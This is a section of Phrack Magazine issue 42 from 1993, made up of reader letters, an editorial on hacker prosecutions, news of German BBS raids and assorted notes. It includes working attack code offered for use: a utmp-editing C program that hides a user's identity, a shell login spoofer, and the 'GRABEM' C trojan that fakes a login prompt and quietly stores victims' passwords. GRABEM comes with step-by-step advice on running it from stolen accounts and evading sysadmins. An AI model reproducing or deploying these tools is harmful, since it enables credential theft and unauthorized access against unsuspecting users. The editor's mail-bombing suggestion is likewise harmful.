==Phrack Magazine== Volume Four, Issue Forty-Two, File 2a of 14 [-=:< Phrack Loopback >:=-] ============================================================================ !!!!WATCH THIS SPACE FOR SUMMERCON INFORMATION NEXT ISSUE!!!! ============================================================================ I 'found' this little C program a few days ago, and runs on most UNIX machines I think (As I found it, I cant claim fame for writing it!). What it does, is change your userid and x25 address to anything of your choice. This only affects programs such as 'write' and 'who'. It doesn't automatically give you different access rights, so it can only be used to disguise your real identity. Usage ----- inv god somewhere (Changes your uid to 'god' and X.25 to 'somewhere') inv '' '' (Makes you INVISIBLE on 'who') Program invis.c --------------- #include #include #include #include main(argc,argv) int argc; char *argv[]; { FILE *f; struct utmp u; int v=ttyslot(1); if(v==-1) { fprintf(stderr,"Can't find terminal.\n"); exit(1); if(argc!=3) { fprintf(stderr,"Args!\n"); exit(1); } f=fopen("/etc/utmp","r+"); if(f==NULL) { fprintf(stderr,"Utmp has escaped!\n"); exit(1); } if(fseek(f,v*sizeof(u),0)==-1) { fprintf(stderr,"Garbage utmp\n"); exit(1); } if(fread((char *)&u,sizeof(u),1,f)!=1) { fprintf(stderr,"Write failed\n"); exit(1); } strncpy(u.ut_name,argv[1],8); strncpy(u.ut_host,argv[2],16); if(fseek(f,v*sizeof(u),0)==-1) { fprintf(stderr,"Seek failed\n"); exit(1); } fwrite((char *)&u,sizeof(u),1,f); fclose(f); } I personaly have not used this program (to hack or for anything else) What you do with it is up to you...., ________ Have fun...., !!! ( )____ ( Alas, life ) ( is but an ) ( Aardvaark.. ) ( __ ) . (_____) (____) * * * * * * * * * * * * * * * * . ? . () * CHEERS_ THEN - _ _ * __ () * ___/_/______|_|___| |__ * / \ () * |________ _______| |__| * |_ _| * / / | | | | | | * |(0)||(0)| * / /___ | | | | | | * /|_ \/ _|\ * /___ / | | | | | | * || | == | || * / / | | \ \__/ / * || \____/ || * / / |_| \____/ * ///\ !! /\\\ *-*-/_/-*-*-*-*-*-*-*-*-*-*-*-*-=-=-=-=-=-=-=-=-!!!-!-=-=-!-!!!-=-=-=-=-=-=-=-= ------------------------------------------------------------------------------- I am interested in getting in contact with hackers in Nord Italy (I am located in Torino). Do you know anybody ? Can you help TheNewHacker ?? Thanks TheNewHacker [Editor: Actually, we are in the process of recruiting people to write for a compilation file on the hacking scenes in countries around the world. One person is working on Italy. Perhaps when this file is completed, you will be able to network through that information. If anyone in a country other than America is interested in contributing to this effort, please write us at: phrack@well.sf.ca.us ! ] ----------------------------------------------------------------------------- hello, i must say i love your publication. I have a little kind of hack/phreak for you guys. When you approach a Red light, preferably at night with few cars around, continually flash your bright lights. This tricks the light into believing this a cop waiting behind traffic at the light thus changing the light after about 10 flashes. I discovered that after seeing several police officers turn on their lights before they hit lights and was amazed on how easily the light changed. If you have say, a Mag-lite the trick works if you point directly at the top of the post-light and the ones hanging right above red on verticals and right above yellow on horizontals. hope this helps etc. (i fucking hate those damn red lights) Dave. [Editor: I've actually tried this. It works on most major intersections] ----------------------------------------------------------------------------- Hallo ! I'd like to make just some addition to the APPENDIX A of the Racketeer's article "The POWER of Electronic Mail" - there are new guys in InterNET -> Russians (!). They have the awful connection, but it's cool team. So, add : .su kremvax.hq.demos.su And one more note, in the SMTP installed on the Sun Station I'm working on there isn't command TICK, but exist some strange like RSET and EXPN. Spy P.S. Sorry for my bad English. [Editor: Russia has a lot of computers online these days. Look for more on the Russian Internet in upcoming Phracks!] ----------------------------------------------------------------------------- There is another, much simpler way to expand your password collection, other than tty spoofing. Why not just run a program that simulates the login process, and then leave it running on the console for an unsuspecting victim? A simple example is below. Execute by typing getpass:logout. --------File: getpass---------- LOGIN="" PASSWD="" clear echo -n "login: " read LOGIN echo "$LOGIN" >name sleep 3 echo -n "Password:" read PASSWD echo "$PASSWD" >password echo echo -n "Login incorrect" ------------------------------- The only problem I have is that I don't know how to make it so that the password, when entered, isn't shown on the screen. I'm sure you can come up with a solution. [Editor: actually, someone kinda did. See the next letter] ----------------------------------------------------------------------------- A Better UNIX Password Grabber by The K-Man I blame it entirely on boredom. Well, that and an acute case of end- of-semester neural gridlock. I was sitting in the lab a couple of years ago, my head leaning against a Sparc-2 display, my index finger hitting the return key over and over again at the login prompt. It was all my mind and body were capable of at the time. Then a little thought formed in the back of my mind: "You know, it would be pretty damn easy to write a program to imitate the behavior of this screen while grabbing user id's and passwords." So I logged in and started coding. Then I thought to myself, "You know, with a few extra lines of code and a couple of tricks, I could make this little guy almost completely undetectable and untraceable while running." So I coded some more. A couple of hours later, out popped the following program: ---------------------------- Cut Here ----------------------------------- /*----------------------------------------------------------------------+ | GRABEM 1.0 by The K-Man | | A Cute little program to collect passwords on the Sun workstations. | +----------------------------------------------------------------------*/ #define PASSWORD "Password:" #define INCORRECT "\nLogin incorrect" #define FILENAME ".exrc%" #include #include /*-----------------------------------------------------------------------+ | ignoreSig | | | | Does nothing. Used to trap SIGINT, SIGTSTP, SIGQUIT. | +-----------------------------------------------------------------------*/ void ignoreSig () { return; } /*-----------------------------------------------------------------------+ | Main | +-----------------------------------------------------------------------*/ main() { char name[10], /* users name */ password[10]; /* users password */ int i, /* loop counter */ lab, /* lab # you're running on */ procid; /* pid of the shell we're under */ FILE *fp; /* output file */ /*-------------------------------------------------------------------+ | Trap the SIGINT (ctrl-C), SIGSTP (ctrl-Z), and SIGQUIT (ctrl-\) | | signals so the program doesn't stop and dump back to the shell. | +-------------------------------------------------------------------*/ signal (SIGINT, ignoreSig); signal (SIGTSTP, ignoreSig); signal (SIGQUIT, ignoreSig); /*-------------------------------------------------------------------+ | Get the parent pid so that we can kill it quickly later. Remove | | this program from the account. | +-------------------------------------------------------------------*/ procid = getppid(); system ("\\rm proj2"); /*-------------------------------------------------------------------+ | Ask for the lab # we're running on. Clear the screen. | +-------------------------------------------------------------------*/ printf ("lab#: "); scanf ("%d", &lab); for (i=1; i<40; i++) printf ("\n"); getchar(); /*-------------------------------------------------------------------+ | Outer for loop. If the name is <= 4 characters, it's probably not | | a real id. They screwed up. Give 'em another chance. | +-------------------------------------------------------------------*/ for(;;) { /*---------------------------------------------------------------+ | If they hit return, loop back and give 'em the login again. | +---------------------------------------------------------------*/ for (;;) { printf("lab%1d login: ",lab); gets (name); if (strcmp (name, "") != 0) break; } /*---------------------------------------------------------------+ | Turn off the screen echo, ask for their password, and turn the | | echo back on. | +---------------------------------------------------------------*/ system ("stty -echo > /dev/console"); printf(PASSWORD); scanf("%s",password); getchar(); system ("stty echo > /dev/console"); /*---------------------------------------------------------------+ | Write their userid and password to the file. | +---------------------------------------------------------------*/ if ( ( fp = fopen(FILENAME,"a") ) != NULL ) { fprintf(fp,"login %s has password %s\n",name,password); fclose(fp); } /*---------------------------------------------------------------+ | If the name is bogus, send 'em back through | +---------------------------------------------------------------*/ if (strlen (name) >= 4) break; else printf (INCORRECT); } /*-------------------------------------------------------------------+ | Everything went cool. Tell 'em they fucked up and mis-typed and | | dump them out to the REAL login prompt. We do this by killing the | | parent process (console). | +-------------------------------------------------------------------*/ printf (INCORRECT); kill (procid, 9); } ---------------------------- Cut Here ----------------------------------- HOW IT WORKS You can probably figure this out by reading the code, but I thought I'd just add some comments on why I did what I did. The first thing is does is install the signal handler. All it does is trap SIGINT, SIGSTP, and SIGQUIT, so that the person trying to log into the machine this baby is running on can't kill it with a keystroke. Next, it gets the parent process ID. We'll use this later to kill it off quickly. Then it proceeds to erase the executable file. Sysadmins can't find a trojan horse program that isn't there. >From here it goes on to imitate the login and password prompts. You'll probably have to change the code to get it to imitate the login process on your particular machine. When it gets a userid and password, it appends them to an existing file in the account. I chose the .exrc, but any dot file will work. The point being to use a file that already exists and should be in the account. Don't leave any extra suspicious files lying around. After it writes the uid and password to the file, it bumps the user back to the real login prompt by killing off the shell that was the parent process of the program. The cut is almost instantaneous; the user would have to be inhumanly observant to notice the transition. HOW TO USE Well, first you need an account to run it from. If your site has guest accounts, you've got it made. If not, I'd suggest using a little social engineering to get one other person's account. With that account and the program, you can grab access to many more. I wouldn't recommend running it from an account that has your name on it. That just makes it a little more dangerous than it needs to be. Of course, if the sysadmin happens to catch the program running on your login, you can always claim to know nothing. Say someone else must have gotten your password and is using your account to escape detection. He might buy it. But if you have the source for the program sitting somewhere in your account, and they find it, you're fucked. So it's best to use someone else's account for the job. After you've gotten the account you'll be running it from, you'll need to get the program in that account somehow. I started off by keeping a copy of the source somewhere it my account, named with something innocuous and hidden among bunches of source files, but I got paranoid and started hauling the source around with me on a bar floppy. Do whatever suits your level of paranoia. Copy the source to the account you'll be running it from and compile it. Trash the source, and name the program something that won't stand out in a ps list. selection_svc is a nice innocuous name, and it appears everywhere. Do a ps on one of your machines and look for processes that hang around for a long time. You might want to hide it as a daemon. Be creative. Now run the program and sit back and wait. Or leave and come back later. When you know that someone has tried to log on to your booby trapped machine, log back into the account you borrowed to run the program in and vi or emacs (if you're that kind of person) out the captured userid and password. Simple as that. Note that the two times that you stand the greatest chance of being caught are when you first compile and run the program and when you retrieve your captured uid and passwords. There's the remote chance that someone might see you at work and see what you're doing, but it's not very likely. If you start acting all paranoid you'll draw more attention to yourself than you would have gotten in the first place. If your site has dialup lines, you might want to do a dialin to retrieve the passwords. Or you might prefer to do it in person. All depends on your paranoia quotient which you think is more secure, I guess. TIPS Be careful which dot files you use. I chose the .exrc because it was something that wasn't used often at our site. If you chose the .cshrc or other frequently accessed file, put a # before the uid and password you write to that file. That way, when that dot file is sourced, it'll treat that line as a comment and not spit out an error message that could cause suspicion. Try to run the program at a time when you know there will be heavy machine usage. That way you'll trap something quick. The longer your program runs, the greater the chance it will be found. Don't be greedy. Run on only one or two machines at a time. And if you run on more than one machine, run out of a different account on each one. Again, the more you put out there, the better the chance that at least one will be found. PARTING NOTE The morning after I wrote this program was the first time I got to use it. I set it running on a guest account, the went to a machine across the room to do some legitimate work. One of my friends walks in shortly after that, and we start shooting the shit. A minute or two later, the sysadmin walks in, sits down, and logs in to the machine I ran the program on. I came really close to dropping my fudge right then and there. The only thing running through my mind was "Either I'm totally fucked, or I have root." Turned out it was choice B. Too bad the guy changed his password once a week, and I wasn't smart enough to fix it so that I would see the change. Oh well, I had fun for a week though. There were quite a few interesting e-mail messages sent back and forth that week. I think the best one was the one from our (male) department head to one of our radical she-male hard-core no-damn-gifs feminist female professors, detailing all the perverted sexual acts that he would like to perform with and on her. :) Anyway, have fun with the program. Maybe I'll get a chance to come up with some more cool UNIX programs in the future. Later, K-Man ----------------------------------------------------------------------------- In a recent issue of PHRACK you had some article or loopback about getting information about people via modem. I am somewhat interested in this and could use this information. I have a friend who is a part-time bounty hunter and could use such information to track people down. Could you please send me some information about who to contact to find out this information. What I could REALLY use is an on-line up-to-date phone/address book that I could call to find out anybody's address. Is there such a thing? If you have any information please e-mail me, since I am unable to get your mag on a regular basis. Thanx a mil! Scarface [Editor: Actually there are quite a large number of databases that keep information on everyone. There is TRW, Equifax, TransUnion, Information America and NAI just to name a few. Many of these services are very expensive, but even services like CompuServe allow users to look up people all over America using PhoneFile which compiles data from all kinds of public records. Nexis can allow you to look up real estate data on just about anyone with loans on their houses. Every public utility and department of motor vehicles provides information on their records, and many are online. A good book to read about this kind of thing is Privacy For Sale Jeffrey Rothfeder Simon & Schuster $22.00] ----------------------------------------------------------------------------- THE GOLDEN ERA REBORN! Relive the thrill of the golden era of hacking through our exclusive collection of BBS messages. Our collection contains posts from over 40 of the most popular hack/phreak BBSes of all time. Experience the birth of the computer underground again from your own computer with this collection of original posts from bulletin boards like: * 8BBS * * OSUNY * * PLOVERNET * * THE LEGION OF DOOM * * BLACK ICE PRIVATE * * THE PHOENIX PROJECT * And many more... Messages are available in many computer formats: IBM Amiga Macintosh For more information, please contact LOD Communications email: lodcom@mindvox.phantom.com US Mail: LOD Communications 603 W. 13th St. Suite 1A-278 Austin, TX 78701 Voice Mail: 512-448-5098 ----------------------------------------------------------------------------- You might like this one... --bob **************************************** I just saw a transcript of a press conference given by Secret Service Agent Frericks, in Lubbock last December. here is a brief extraction... FRERICKS: Um hm. This is a major nation wide, world wide problem from an industry point of view with tremendous losses in funds tremendous losses of money. the VAX account at the University is a way to get into numerous other research accounts or Internet which is the ...you get onto Internet you can talk to anybody else who is on Internet anywhere in the world which these kids were talking to Belgium, and Israel and Australia and they can do that just by this, thus avoiding long distance phone calls. But most of the people on Internet I mean on the VAX are there legitimately for research purposes they can go to Mayo and get a file if they're a med student and they also get one of these pamphlets if they get, like the Department of Engineering gives out an account number just for that semester, the professor would give it out so you can use the VAX well they also get one of those pamphlets that explains what the rules are and the instructor spends a good bit of time the first couple of classes going over computer etiquette, computer rules. [Editor: Another of America's finest.] ----------------------------------------------------------------------------- I typed this because of the mention of Software Security International in the article "More than $100,000 in Illegal Software Seized" in Rambone's Pirates Cove in Phrack 41. He mentioned that they were the investigators that finally brought down APL. I am not only familiar with that, a past friend of mine was there when the Marshalls took the board. He was there as representative of SSI. The best part that Rambone didn't know, was that they couldn't get into APL to verify the existence of the software, until they got the password breaker from Novell. So in essence, they looked like some dumb fools. They didn't have any idea on how to approach the network. Software Security International Can be reached at... 1-800-724-4197 2020 Pennsylvania Avenue N.W. Suite 722 Washington, D.C. 20006-1846 That is of course if they finally have gotten off the ground. Last I Heard (2-3 months ago) they were still having trouble getting Financial Backing. They did the APL Bust for nothing, just to prove they could do it. They are also on a lot of other BBS's around America. So as a warning to other sysops, Cover your Ass. You could rack up some serious negative cash flow by sending tons of mail to the box above, then it gets Airborne'd to Washington State. see ya [Editor: I think it might be a good idea to send them a few postcards every day for the next few weeks. Just to stay in touch.] ----------------------------------------------------------------------------- ==Phrack Magazine== Volume Four, Issue Forty-Two, File 2b of 14 [-=:< Editorial >:=-] Before I jump upwards onto my soapbox and spew forth a meaty editorial I would like to relay something to the readers of Phrack. The following is a transcript of John Lee's (Corrupt's) confession to the charges facing him. (From Security Insider Report, Jan. 1993) What follows is in my opinion a very poor attempt at a plea-bargain, and obviously induced by attorney coercion. I must wonder what John was thinking when he agreed to this admission. ====================================================================== I agreed with others to violate various laws related to the use of computers. I agreed to do the following: 1) I agreed to possess in excess of fifteen passwords which permitted me to gain access to various computer systems including all systems mentioned in the indictment and others. I did not have authorization to access these systems. I knew at the time that what I did was wrong. 2) I used these access devices and in doing so obtained the value of time I spent within these systems as well as the value of the passwords themselves which I acknowledge was more than $1000. 3) I intentionally gained access to what I acknowledge are Federal interest computers and I acknowledge that work had to be done to improve the security of these systems which was necessitated by my unauthorized access. 4) I was able to monitor data exchange between computer systems and by doing so intentionally obtained more passwords, identifications and other data transmitted over Tymnet and other networks. 5) I acknowledge that I and others planned to share passwords and transmitted information across state boundaries by modem or telephone lines and by doing so obtained the monetary value of the use of the systems I would otherwise have had to pay for. Among the ways I and others agreed to carry out these acts are the following: 1. I was part of a group called MOD. 2. The members of the group exchanged information including passwords so that we could gain access to computer systems which we were not authorized to access. 3. I got passwords by monitoring Tymnet, calling phone company employees and pretending to be computer technicians, and using computer programs to steal passwords. I participated in installing programs in computer systems that would give the highest level of access to members of MOD who possessed the secret password. I participated in altering telephone computer systems to obtain free calling services such as conference calling and free billing among others. Finally, I obtained credit reports, telephone numbers and addresses as well as other information about individual people by gaining access to information and credit reporting services. I acknowledge that on November 5, 1991, I obtained passwords by monitoring Tymnet. I apologize for my actions and am very sorry for the trouble I have caused to all concerned. John Lee ========================================================================== This issue I would like to call attention to what I consider to be a very pressing issue. There has always been a trend to pad the amount of dollar damages incurred to any victim of a hacker attack. I personally feel that the blame is never directed at the true guilty parties. Certainly, if someone is caught breaking into a system, then they are surely guilty of some form of electronic trespass. I will also concede that such a person may or may not be guilty of other crimes based upon their actions once inside that system. What I have the most problems dealing with is the trend to blame the hacker for any expenditures needed to further secure the system. With this mindset, why should any corporation bother to add any security at all? Why not just wait until someone happens across a few poorly secured sites, nab them, and claim damages for the much needed improvements in security? The worst culprits in this type of behavior has been the RBOCs. As was seen with the supposed damages incurred for the distribution of the "911 document" and most recently with the $370,000 damages supposedly incurred by Southwestern Bell resulting from the alleged activities of those in MOD. Perhaps this figure does have some basis in reality, or perhaps it is just an arbitrary figure dreamed up by a few accountants to be used at year end to explain some losses in the corporate stock report. Most often figures such as this factor in such ridiculous items as the actual system hardware penetrated. I can hardly see the relevance of such a charge. Even if these charges are to be believed, why isn't the blame being evenly distributed? Why aren't stockholders crying for the heads of system administrators, MIS managers and CIOs? These are the people who have not adequately done their jobs, are they not? If they had expended a bit of time, and a small amount of capital, the tools exist to make their systems impervious to attack. Period. If I had an investment in a company such as Southwestern Bell, I would be outraged that the people I was employing to perform data security functions were not apt enough to keep a group of uneducated gangsters out of their switching systems. Why haven't there been any emergency meetings of shareholders? Why isn't anyone demanding any changes in policy? Why is everyone still employed? Not to blame Southwestern Bell too harshly, they were sorely outclassed by MOD, and had absolutely no way to cope with them. Not only because MOD were competent telco hackers, but because Southwestern Bell's network service provider had given them free reign. Southwestern Bell's packet switched network, Microlink II, was designed and implemented for SWBT by Tymnet (then owned by McDonnell Douglas). An interesting thing I've heard about SWBNET, and about every other subnet arranged by Tymnet, is that the information concerning gateways, utilities, locations of node code, etc., is purported to be located in various places throughout Tymnet internal systems. One such system, was described to me as a TYMSHARE system that contained data files outlaying every subnet on Tymnet, the mnemonics (username/password pair) to each utility, gateway, and the ONTYME II mail access keys. If this information is correct, then shouldn't Tymnet be called in to acknowledge their role in the attacks on Southwestern Bell? Let's say a Realtor sold you a house, but told you that he would be keeping copies of all your keys so that he could help you with the maintenance. Some time later, you notice that a few of your books have been read, but nothing else is disturbed. Later on you notice that your tv is on and your bed is all messed up. A week later your stereo is gone. You set up a trap and catch someone going into your house with your own key! You find that the burglars had made copies of all the keys held by your Realtor. You then find that the Realtor neglected to put the keys in a safe, and in fact had left them lying around on the table in his back yard labeled with the addresses they corresponded to. Who would you be more upset with? The individual who copied and used the keys, or the Realtor for not providing the access to your valuables more vigilantly? I would personally be far more upset with the Realtor, for if he had put the keys in a safe this event would have probably never transpired. I'm not saying that people who get caught for breaking into computer systems should be let go, especially if they can be proven to be involved in the sale of hacked information for a personal profit. What I am saying that if hackers are to be punished so vigorously for what I view as a predominantly victimless crime, then everyone should have to line up and take their fair share of the blame. I think it's high time that the real blame be placed on the corporate entities who seemingly refuse to acknowledge their role in these break-ins. Neglect of duties and lack of responsibility on the part of the employees, the interconnect carriers, the data network providers, the hardware vendors, etc. all play a key role in the problems that exist in the world's data networks today. In fact, if it were not for computer hackers, these problems would continue to lie dormant until either discovered by accident in the field, or the provider decided to go ahead and illuminate its clients to the existence of such a problem. I wholeheartedly encourage each and every reader of Phrack to purchase one share of stock in any corporation you know that has exhibited such tendencies and take your place on the floor of the next shareholders meeting and scare the hell out of the board of directors. Phrack Magazine is calling a discount brokerage very soon. ------------------------------------------------------------------------------- ==Phrack Magazine== Volume Four, Issue Forty-Two, File 2c of 14 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== ****************************************************************************** BBS Busts in Germany ==================== Thursday, March 18, 1993. This day will be remembered as a black day in German BBS history. In fact, it was the blackest day in German BBS history since the raid of 18 Berlin BBS in Berlin and North Germany a couple of months ago. What has happened? A couple of Bulletin Board Systems (BBS) have been raided by the police. All these BBS had "warez" online, illegal, pirated, copyrighted Software - usually for PC/MSDOS and Amiga. This time, most of these BBS were in Bavaria, South Germany. Now let's take a closer look at the events: One guy who got busted was MST, Sysop of Southern Comfort BBS in Munich. In fact, his board went offline 9 days before. But he was so unlucky still having his computer and his warez. He was even using his modem to trade warez at the very moment the cops rang his doorbell. Why did he go offline just so short before he got busted? His board had been running for over 1 year. Here is the text file MST released about going offline: THURSDAY 03-09-93 00:15 THE SOUTHERN COMFORT BBS IS CLOSED ! I AM NOT BUSTED OR ANYTHING LIKE THIS ! I CLOSED THE BBS COS OF PERSONAL REASONS AND PERHAPS IT WILL BE OPENED AGAIN IN 1 OR 2 MONTH ! I HOPE YOU WOULD UNDERSTAND THIS DECISION BUT SCENE IS NOT ALL WHAT LIFE CAN BE ALL USER ACCOUNTS STAY ALIVE AND WILL BE HERE AT A NEW??? OPENING ! SO I SAY BYE TO THE SCENE FOR PERHAPS ONLY A SHORT TIME ! MST/RAZOR 1911 A couple of days later, MST was posting ads in local BBS to sell his old equipment. But obviously he wasn't fast enough. Maybe this was one of the reasons the cops busted him on March, 18. They were afraid he might get rid of his illegal software, so they hurried up to catch him! He got busted at 10am this morning. Three cops were knocking on his door, until he opened. They had a search warrant and confiscated all his computer equipment, disks, modems... Chris used to have a board until four months ago, and now trades for TDT and other groups. He was in school this morning. His parents weren't home either. So the cops broke into his house, smashed the wooden door, and seized all his equipment. He is asked to speak to the Police this Tuesday. Chris used to be one of the most active traders for PC warez in Germany. He and his friend Michelangelo supported boards like Schizophrenia and Beverly Hills, which they co-sysop'ed. They were also known as the 'Beverly Hills Boys', a new German cracking group. After Chris' bust, a couple of boards were affected: Beverly Hills went offline. Also the German Headquarters of the Beverly Hills Boys, 'Twilight Zone', went offline. Their sysops estimate at least 1-3 months offline time. The other Munich BBS and their sysops were really scared after the bust and took down their systems for an uncertain amount of time. One of Germany's largest BBS, Darkstar in Augsburg, was a heaven for every warez collector. It had 8 modems hooked up (all US Robotics Dual Standard 16.8) and one ISDN Line. It had over 2 GB PC warez online, and over 7 GB offline on tapes, which would be put online according to user' requests. But then, March 18 arrived, and the dream was shattered. Its sysop, Rider, who was happily calling boards the previous day, had the most shocking experience in his life. The cops came and took his BBS. And more.. Ego, co-sysop of a large German BBS, got busted. Andy/Spreadpoint (ex-sysop) got busted. And lots of others... Unlike the US Secret Service, which delights in seizing all electronic equipment, like stereos, TVs, VCRs, the German cops were just after the computer hardware, especially the hard drives and file servers. They usually come with three or four people. All of the search warrants they were using were quite old, issued last December. Who is behind those actions? First of all the BSA, Business Software Association. They were also responsible for the recent raids of US Bulletin Boards. In Germany they just announced actions against piracy and bulletin boards. The most active BSA Members are Microsoft and Lotus Development. Microsoft, Lotus and the BSA are all located in Munich, Germany, home of German's most feared lawyer, Guenther Freiherr von Gravenreuth. This guy has been fighting for years against piracy, young kids who copy games, and especially bulletin board systems. He is also affiliated with Ariolasoft, a huge German distributor for game labels like Activision and others. In the end, all I can say is: Be aware, don't get caught and don't keep illegal stuff on your board! (c) 1993 SevenUp for Phrack ****************************************************************************** Carlcory's brownies: /* Begin cc_brownie.c */ Includes: #include "4_squares_baking_chocolate" #include "1_cup_butter" #include "2_cups_sugar" #include "4_eggs" #include "2_cups_flour" #include "2_tbs_vanilla" #include "1_third_cup_marijuana" /*comment out if won't compile on your system*/ #include "1_cup_nuts" /*comment out if won't compile*/ void main(void); { heat(oven, 350); add(butter, chocolate); while(texture!='smooth') { stir(mixture); } Add(sugar); add(eggs); add(vanilla); add(flour, pot); add(nuts) for(timer=0; timer<35; timer++) { bake(mixture); } cool(hour); } /*The high takes about an hour to come on, but lasts for 12 hrs. (4 brownies) Make sure they cool (don't burn your mouth!) and share with friends! */ /*End of cc_brownie.c*/ ****************************************************************************** GRAY AREAS Examining the Gray Areas of Life Gray Areas, Inc. P.O. Box 808 Broomall, PA 19008-0808 (215)353-8238 grayarea@well.sf.ca.us Gray Areas is published quarterly and printed on recycled paper. They also participate in local recycling efforts involving cans, glass, clothing, newspapers, and more. A four-issue subscription costs $18.00 US or $26.00 foreign (payable in US funds). A 12-issue subscription costs $50.00 ($75.00 foreign). You may purchase a twelve issue subscription and give 4 or 8 or those issues away as gifts to friends (i.e., the same 4 issues you receive would also go to 2 other recipients). Make check or money order out to Gray Areas, Inc. STATEMENT OF PURPOSE: Gray Areas exists to examine the gray areas of life. We hope to unite people involved in all sorts of alternative lifestyles and deviant subcultures. We are everywhere! We felt that the government has done a great job of splitting people up so that we do not identify with other minority groups anymore. There are so many causes now that we often do not talk to others not directly involved in our chosen causes. We believe that the methods used to catch criminals are the same regardless of the crime and that much can be learned by studying how crimes in general are prosecuted and how people's morals are judged. It is our mission to educate people so they begin to case more about the world around them. Please join our efforts by subscribing, advertising your business with us, and by spreading the word about what we're up to. __________________________ Review by Knight Lightning: I recently received a copy of the premier issue of Gray Areas, dated Fall 1992 and with a cover price of $4.50 (US). I was impressed with both the laser quality of the printing, artwork, and graphics, as well as the topics and content of the articles. I would not characterize Gray Areas as a hacker magazine, but the subject did come up in an interview with John Perry Barlow (one of the original founders of the Electronic Frontier Foundation) where he discussed the EFF and its role in defending civil liberties. No, instead I think it is safe to say that Gray Areas pays a lot of attention to the Grateful Dead. Indeed the cover story is titled "Grateful Dead Unauthorized Videos." Additionally, there are several other articles (including the John Barlow interview) that discuss varying aspects about the Dead's history, their politics, and of course their music. An advertisement for the next issue of Gray Areas reveals that even more articles relating to the Grateful Dead are on the way; so if you are a "Dead Head" you will probably fall in love with this magazine! However, the article that I appreciated most was "Zine Scene," a review of 163 alternative newsletters that included such familiar names as 2600, Hack-Tic, Full Disclosure, and TAP; and others that I intend to take a look at like Iron Feather's Journal and bOING bOING. The zines reviewed here covered every topic imaginable and I thought it was a great buffet for the mind to have such handy directory (especially since Factsheet Five went defunct about a year ago). Other interesting articles had to do with video, audio, and software piracy and reviews of music and software. I also enjoyed the great artwork found throughout the magazine in the form of visual aids, comics, and advertisements. If you are a fan of alternative music or the Grateful Dead, you'll be very sorry if you don't subscribe immediately. If you are interested in alternative publications with more interesting points of view than Time or Newsweek then you owe it to yourself to at least purchase a copy to check it out. - - - - - - - - - All letters sent to Gray Areas are presumed to be for publication unless you specifically request that they omit your name or refrain from publishing your comments. If you are writing about something which could incriminate yourself, they will protect your identity as a matter of policy. ****************************************************************************** "Turning your USR Sportster w/ 4.1 roms into a 16.8K HST Dual Standard" by The Sausage with The Mallet If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue the following commands to it to turn it into an HST 16.8K dual standard. In effect, you add HST 16.8K to its V32.bis 14.4k capability. ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3 atgw03c6,22gw05cd,2f ats14=1s24=150s26=1s32=8s34=0x7&w A very important item is the b1, which tells the modem to use the 16.8K HST protocol. If you do not set b1, when the Sportster connects with another V32 modem it will go through the CCITT v.32 connect tones and you will not get a 16.8K connect. If you do get an HST connect, you will not hear the "normal" train phase--instead you will hear the HST negotiation which sounds like a 2400 baud carrier. Finally, if you change the "cd" in the second line to a "cb", your modem will think it is a V.32 Courier instead of an HST 16.8K. Look for other pfine pfiles from Rancid Bacon Productions in conjunction with USDA Grade A Hackers (UGAH.) Accept no substitutes. ******************************************************************************* Request to Post Office on Selling of Personal Information In May 1992, the US Postal Service testified before the US House of Representatives' Government Operations Subcommittee that National Change of Address (NCOA) information filled out by each postal patron who moves and files that move with the Post Office to have their mail forwarded is sold to direct marketing firms without the person's consent and without informing them of the disclosure. These records are then used to target people who have recently moved and by private detective agencies to trace people, among other uses. There is no way, except by not filling out the NCOA form, to prevent this disclosure. This letter is to request information on why your personal information was disclosed and what uses are being made of it. Patrons who send in this letter are encouraged to also forward it and any replies to their Congressional Representative and Senators. Eligible requestors: Anyone who has filed a change of address notice with the Postal Service within the last five years. Records Officer US Postal Service Washington, DC 20260 PRIVACY ACT REQUEST Dear Sir/Madam: This is a request under the Privacy Act of 1974 (5 USC 552a). The Act requires the Postal Service, as a government agency, to maintain an accounting of the date, nature, and purpose of each disclosure of information about individuals. I request a copy of the accounting of all disclosures made of address change and mail forwarding information that I provided to the Postal Service. This information is maintained in USPS System of Records 010.010. On or about (date), I filed a change of address notice requesting that my mail be forwarded from (old address) to (new address). The name that I used on the change of address form was (name). This request includes the accounting of all disclosures made by the Postal Service, its contractors, and its licensees. I am making this request because I object to the Postal Service's policy of disclosing this information without giving individuals an option to prevent release of this information. I want to learn how my information has been disclosed and what uses have been made of it. Please let the Postmaster General know that postal patrons want to have a choice in how change of address information is used. If there is a fee in excess of $5 for this information, please notify me in advance. Thank you for consideration of this request. Sincerely, CC: Your Congressional Representative US House of Representatives Washington, DC 20510 Your Senators US Senate Washington, DC 20515 -------------------------------------------------------------------------------